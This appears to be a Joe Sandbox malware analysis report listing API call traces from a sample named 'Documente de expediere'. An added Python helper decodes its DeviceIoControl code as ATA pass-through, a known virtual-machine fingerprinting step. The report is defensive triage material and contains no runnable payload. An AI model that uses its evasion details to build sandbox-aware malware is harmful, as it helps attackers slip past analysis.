                                                  • Part of subcall function 0069410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006941F1
                                                • KillTimer.USER32(?,00000001,?,?), ref: 006945B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006945C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006CD6CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: 2791045b7af55d82431e3f90529b98cb08b9d79334ac315f394500babee23d42
                                                • Instruction ID: f487ec0422ba931940cf6ada488c76770dbdda019c596875d4997aa75b4d1438
                                                • Opcode Fuzzy Hash: 2791045b7af55d82431e3f90529b98cb08b9d79334ac315f394500babee23d42
                                                • Instruction Fuzzy Hash: F221F570904784AFEB328B648C45FF7BBEDDF01304F00409EE69E56281C7B41A85CB55
                                                APIs
                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006F40D1
                                                • _memset.LIBCMT ref: 006F40F2
                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006F4144
                                                • CloseHandle.KERNEL32(00000000), ref: 006F414D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                • String ID:
                                                • API String ID: 1157408455-0
                                                • Opcode ID: 7eb53ce48727c45af4b05ffbd52d70fcc5fd7bc823c53dc96013b22bcf37a157
                                                • Instruction ID: 7163b06fc7f8a02323c7a2db4e25addf9a51492b14136a6f0da9a72092c3f60d
                                                • Opcode Fuzzy Hash: 7eb53ce48727c45af4b05ffbd52d70fcc5fd7bc823c53dc96013b22bcf37a157
                                                • Instruction Fuzzy Hash: 9B11AB7590122C7AE7309BA59C4DFFBBB7CEF45760F10419AF908D7290D6744E808BA4
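The control code in the DeviceIoControl record above, 0004D02C, can be decoded without a lookup table, because Windows composes IOCTLs with CTL_CODE(DeviceType, Function, Method, Access) = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. Its fields are DeviceType 0x4 (FILE_DEVICE_CONTROLLER, which is IOCTL_SCSI_BASE), Function 0x40B, METHOD_BUFFERED and FILE_READ_ACCESS | FILE_WRITE_ACCESS, and that is IOCTL_ATA_PASS_THROUGH. The surrounding calls fit: the device is opened with GENERIC_READ | GENERIC_WRITE (C0000000), full sharing (3) and OPEN_EXISTING (3), a buffer is zeroed with _memset, and a raw ATA command is sent with 0x200-byte (one sector) buffers in each direction. Pass-through commands are the usual way to read a drive's model and serial strings, which matters for triage because those strings are a common VM fingerprint; what this sample does with the result is not visible in the record. The Python below is an added example, not code from the sample or from Joe Sandbox: it splits any IOCTL into its CTL_CODE fields, names the pass-through and SMART codes most often seen in sandbox reports, and pulls the code out of a record line in the "Name.MODULE(args), ref: addr" layout printed on this page (the regular expression for that layout is an assumption about the page format, and the sample record line is copied from the listing above).

```python
"""Decode Windows IOCTL codes found in sandbox API records (added example)."""
import re
from typing import List, NamedTuple, Optional, Tuple

METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Device types from winioctl.h / ntddscsi.h that come up when triaging malware.
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
                0x07: "FILE_DEVICE_DISK (IOCTL_DISK_BASE)",
                0x2D: "FILE_DEVICE_MASS_STORAGE (IOCTL_STORAGE_BASE)"}


class Ioctl(NamedTuple):
    code: int
    device_type: int
    function: int
    method: int
    access: int


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """CTL_CODE() exactly as winioctl.h defines it."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> Ioctl:
    """Split a control code back into its four CTL_CODE fields."""
    return Ioctl(code,
                 device_type=(code >> 16) & 0xFFFF,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3,
                 access=(code >> 14) & 0x3)


# Built from the CTL_CODE definitions rather than hard-coded, so the table
# doubles as a check that the encoder matches the header.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x40B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x40C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x07, 0x022, 0, 3): "SMART_RCV_DRIVE_DATA",
    ctl_code(0x2D, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def describe(ioctl: Ioctl) -> str:
    name = KNOWN_IOCTLS.get(ioctl.code, "unknown")
    dev = DEVICE_TYPES.get(ioctl.device_type, f"device type {ioctl.device_type:#x}")
    return (f"{ioctl.code:#010x} = {name}: {dev}, function {ioctl.function:#x}, "
            f"{METHOD_NAMES[ioctl.method]}, {ACCESS_NAMES[ioctl.access]}")


# Assumed layout of the API records on this page: "Name.MODULE(arg,arg,...), ref: ADDR".
# The leading bullet is optional; "?" marks an argument the sandbox could not resolve.
RECORD_RE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_record_line(line: str) -> Optional[Tuple[str, str, List[str], int]]:
    """Return (api, module, args, ref address) for one record line, or None if it is not one."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return m.group("api"), m.group("module"), args, int(m.group("ref"), 16)


def ioctl_from_record(line: str) -> Optional[Ioctl]:
    """Decode dwIoControlCode (the 2nd DeviceIoControl argument) from a record line, if resolvable."""
    parsed = parse_record_line(line)
    if parsed is None or parsed[0] != "DeviceIoControl" or len(parsed[2]) < 2:
        return None
    code_arg = parsed[2][1]
    if code_arg == "?":
        return None
    return decode_ioctl(int(code_arg, 16))


# Copied from the record above.
RECORD_LINE = ("• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), "
               "ref: 006F4144")

if __name__ == "__main__":
    print(describe(ioctl_from_record(RECORD_LINE)))
```

Decoding the fields is more useful than matching the raw value: an unfamiliar code with DeviceType 0x4 or 0x7 and both access bits set is still a storage pass-through of some kind, and the nInBufferSize/nOutBufferSize arguments in the same record (0x200 here) tell you how much command and response data the caller expected.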
                                                APIs
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7B20,?,?,00000000), ref: 00695B8C
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7B20,?,?,00000000,?,?), ref: 00695BB0
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007066AC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007066B7
                                                • _memmove.LIBCMT ref: 007066E4
                                                • inet_ntoa.WSOCK32(?), ref: 007066EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: 522c6609b6a743f59a7c51fdf3cfb9c23e154282e8722329431cec85f33850ec
                                                • Instruction ID: 970f45a5c392e9db7944ade2c731a259ae7dc4848f653393a1207cdb6b767193
                                                • Opcode Fuzzy Hash: 522c6609b6a743f59a7c51fdf3cfb9c23e154282e8722329431cec85f33850ec
                                                • Instruction Fuzzy Hash: 43117975900508AFCF41FBA8D996DEEB7BDAF14310B048129F502A72A1DF34AE14CB69
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 006E9043
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E9055
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E906B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E9086
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                • Instruction ID: 9f1986e03a525d5e18e75caab1b8b231dfea9f33f4f63582299ff63f3cdbb2ca
                                                • Opcode Fuzzy Hash: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                • Instruction Fuzzy Hash: 69114C79901218FFDB10DFA5C885EDDBB75FF48310F204095E904B7290D6716E50DBA4
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                • GetClientRect.USER32(?,?), ref: 006CB84B
                                                • GetCursorPos.USER32(?), ref: 006CB855
                                                • ScreenToClient.USER32(?,?), ref: 006CB860
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 29e11118999fc81400ff1e106778d97f43170ac3e169084c0a67c5bf95c882d5
                                                • Instruction ID: 1855b7f3ae47d8cc2f07bd61ca654d9ff514479228015685bac14a3fd611b522
                                                • Opcode Fuzzy Hash: 29e11118999fc81400ff1e106778d97f43170ac3e169084c0a67c5bf95c882d5
                                                • Instruction Fuzzy Hash: A2112B3550001AABCF00EFA8D8859FE77BEEB06301F5044A5F901EB651C734BA918BA9
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F166F
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F1694
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F169E
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F16D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 075d6985c50f6ce019c02c5ba472c40663038e0dec70580b4822356b3478ec6f
                                                • Instruction ID: ca149cad7f93e67fce6e1b53f592c1c40aad37d6f82f411b666e5f69d0e50a21
                                                • Opcode Fuzzy Hash: 075d6985c50f6ce019c02c5ba472c40663038e0dec70580b4822356b3478ec6f
                                                • Instruction Fuzzy Hash: AC115231D0051DE7CF009FA5D944AFEBF79FF0A791F158159DA40FA240CB3455509B9A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: f60e21115057fde5e422975fb29557482437150954833999394424eb78964b72
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: 16017B3204814ABBCF525F85DC01DEE3F27FF29340B088619FA1858131C23ACAB1AF81
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 0071B59E
                                                • ScreenToClient.USER32(?,?), ref: 0071B5B6
                                                • ScreenToClient.USER32(?,?), ref: 0071B5DA
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0071B5F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                • Instruction ID: 21c421c107557cf3811dd61183703eba57afab117af3351d027bfa1215fc3003
                                                • Opcode Fuzzy Hash: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                • Instruction Fuzzy Hash: 811146B9D00209EFDB41CF99C4449EEFBB5FB08310F108166E914E3260D735AA658F54
                                                APIs
                                                • _memset.LIBCMT ref: 0071B8FE
                                                • _memset.LIBCMT ref: 0071B90D
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00757F20,00757F64), ref: 0071B93C
                                                • CloseHandle.KERNEL32 ref: 0071B94E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: f04b2c087b47664b3e26d7e70e0c79da134d970278a30bfcd6907f5f9b2a1862
                                                • Instruction ID: c467f396b383791030c6b734de096301e2694f1020d796e58badf61dd2570c49
                                                • Opcode Fuzzy Hash: f04b2c087b47664b3e26d7e70e0c79da134d970278a30bfcd6907f5f9b2a1862
                                                • Instruction Fuzzy Hash: 74F05EF2644310BBE210AB65BC06FFB3A5DEB08355F008031FA09D52E2D7BA5901C7AC
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 006F6E88
                                                  • Part of subcall function 006F794E: _memset.LIBCMT ref: 006F7983
                                                • _memmove.LIBCMT ref: 006F6EAB
                                                • _memset.LIBCMT ref: 006F6EB8
                                                • LeaveCriticalSection.KERNEL32(?), ref: 006F6EC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: ecb43adb0bb6f8bd4c1f7a4f6516a6529a20a3c965a341317f939b3bdcb7584c
                                                • Instruction ID: 10ef9b025a2242a3d789ccf9e9905df2c35a3d63d1ad7d0de73b2b2eac31da6f
                                                • Opcode Fuzzy Hash: ecb43adb0bb6f8bd4c1f7a4f6516a6529a20a3c965a341317f939b3bdcb7584c
                                                • Instruction Fuzzy Hash: EDF05E7A200214BBCF416F55DC85A9ABB2AFF45320B04C065FE085F26ACB75A951DBB8
                                                APIs
                                                  • Part of subcall function 006912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069135C
                                                  • Part of subcall function 006912F3: BeginPath.GDI32(?), ref: 00691373
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069139C
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0071C030
                                                • LineTo.GDI32(00000000,?,?), ref: 0071C03D
                                                • EndPath.GDI32(00000000), ref: 0071C04D
                                                • StrokePath.GDI32(00000000), ref: 0071C05B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 6958861c2280b13c287139456d8cd6791b2585e8a6986f6ba501f315ddbe5df8
                                                • Instruction ID: b2e8191c150d1cf630876d010172bd0e5264d9daf3b4f6fc4c25b1c7f7e801cf
                                                • Opcode Fuzzy Hash: 6958861c2280b13c287139456d8cd6791b2585e8a6986f6ba501f315ddbe5df8
                                                • Instruction Fuzzy Hash: E1F05E31141269BBDB126F98AC0AFCE3F59AF1A311F14C000FA15650E2C7BD5691DB99
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006EA399
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA3AC
                                                • GetCurrentThreadId.KERNEL32 ref: 006EA3B3
                                                • AttachThreadInput.USER32(00000000), ref: 006EA3BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: f3b079e1a4b2fe3201157bf0206f951b16afbeb10a76f7cf65091b4e1483d14f
                                                • Instruction ID: 38ddb9b161bf251442d1ae927e333dbc4fc91ea7cdb47a432b1cbe6a3bf3a4c1
                                                • Opcode Fuzzy Hash: f3b079e1a4b2fe3201157bf0206f951b16afbeb10a76f7cf65091b4e1483d14f
                                                • Instruction Fuzzy Hash: B1E06D31142368BADB201FA6DC0DED73F2DEF167A1F00C024F508C40A0C675D540DBA5
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00692231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0069223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00692250
                                                • GetStockObject.GDI32(00000005), ref: 00692258
                                                • GetWindowDC.USER32(?,00000000), ref: 006CC0D3
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 006CC0E0
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 006CC0F9
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 006CC112
                                                • GetPixel.GDI32(00000000,?,?), ref: 006CC132
                                                • ReleaseDC.USER32(?,00000000), ref: 006CC13D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: 8aacfdb4e9216505138f29fcdf25fc072ab17312db1a39c8d7b462aa66226268
                                                • Instruction ID: a036708f3935a8c29390b9e99e3bb6e8558169f7a2682f3c079d9a51fe2c10e1
                                                • Opcode Fuzzy Hash: 8aacfdb4e9216505138f29fcdf25fc072ab17312db1a39c8d7b462aa66226268
                                                • Instruction Fuzzy Hash: 47E03031104144FADB215F68EC09BD83B15EB05332F14C366FA69880E1C7754590DB11
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 006E8C63
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C6A
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E882E), ref: 006E8C77
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                • Instruction ID: fc3b123762660f7b0ddf1e27c0ea6d7485a9bb92bd5f25e212179d41c5b3b1a8
                                                • Opcode Fuzzy Hash: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                • Instruction Fuzzy Hash: F8E04F366423119FD7205FB56E0CBD63BA8AF55B92F15C828E649CA090DA3894418B65
